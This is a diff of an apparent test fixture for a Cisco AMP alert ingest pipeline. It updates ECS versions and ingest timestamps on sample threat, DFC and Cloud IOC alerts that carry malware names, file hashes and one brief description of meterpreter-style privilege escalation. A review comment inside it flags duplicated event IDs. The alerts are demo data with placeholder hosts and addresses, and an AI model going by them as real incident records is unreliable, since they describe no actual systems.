Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "kind": 
"alert",
 "action": "Threat Detected",
@@ -275,7 +275,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "user": [
@@ -307,7 +307,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469618886Z", + "ingested": "2021-09-13T18:06:41.546089852Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "kind": 
"alert", "action": "Threat Detected", @@ -368,7 +368,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -394,7 +394,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469620841Z", + "ingested": "2021-09-13T18:06:41.546091935Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -481,7 +481,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -507,7 +507,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469622790Z", + "ingested": "2021-09-13T18:06:41.546093998Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -591,7 +591,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
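Review bot: The `DFC Threat Detected` document in this hunk and those in the `@@ -617`, `@@ -727`, `@@ -837`, `@@ -947` and `@@ -1057` hunks all carry the same `"id": "6180341055704007000"` even though their embedded `detection_id` values differ (…662, …657, …661, …660, …659, …658), so six distinct alerts share one `event.id`. The source `data.id` appears to have lost precision before reaching the pipeline (it ends in `000` while the string `detection_id` keeps its low digits, and the same pattern shows in the `@@ -205` hunk with `6180352115244794000` versus `6180352115244793858`), which is the usual result of a 64-bit identifier being parsed as a double. Any deduplication, fingerprinting or alert correlation keyed on `event.id` downstream would collapse these into a single alert, hiding five of the six detections from analysts. Since this is a regenerated expected-output fixture the fix belongs in the ingest pipeline rather than here — for example preferring the exact `detection_id` string when it is present, which would yield `"id": "6180341055704006662"` for this document — but the fixture makes the collision visible and worth tracking. The enclosing document continues outside the hunk.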
@@ -617,7 +617,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469624731Z", + "ingested": "2021-09-13T18:06:41.546096107Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -701,7 +701,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -727,7 +727,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469626640Z", + "ingested": "2021-09-13T18:06:41.546098190Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -811,7 +811,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -837,7 +837,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469628547Z", + "ingested": "2021-09-13T18:06:41.546100246Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -921,7 +921,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -947,7 +947,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469630455Z", + "ingested": "2021-09-13T18:06:41.546102333Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -1031,7 +1031,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1057,7 +1057,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469632385Z", + "ingested": "2021-09-13T18:06:41.546104374Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -1114,7 +1114,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1134,7 +1134,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:04.469634316Z", + "ingested": "2021-09-13T18:06:41.546106398Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", "kind": "alert", "start": "2021-01-15T10:32:58.000Z", 
@@ -1197,7 +1197,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1229,7 +1229,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469636399Z", + "ingested": "2021-09-13T18:06:41.546108632Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1287,7 +1287,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -1307,7 +1307,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:04.469638309Z", + "ingested": "2021-09-13T18:06:41.546110725Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "kind": "alert", "start": "2021-01-15T10:24:58.000Z", @@ -1367,7 +1367,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1399,7 +1399,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469640203Z", + "ingested": "2021-09-13T18:06:41.546112777Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1456,7 +1456,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -1484,7 +1484,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469642099Z", + "ingested": "2021-09-13T18:06:41.546114815Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat 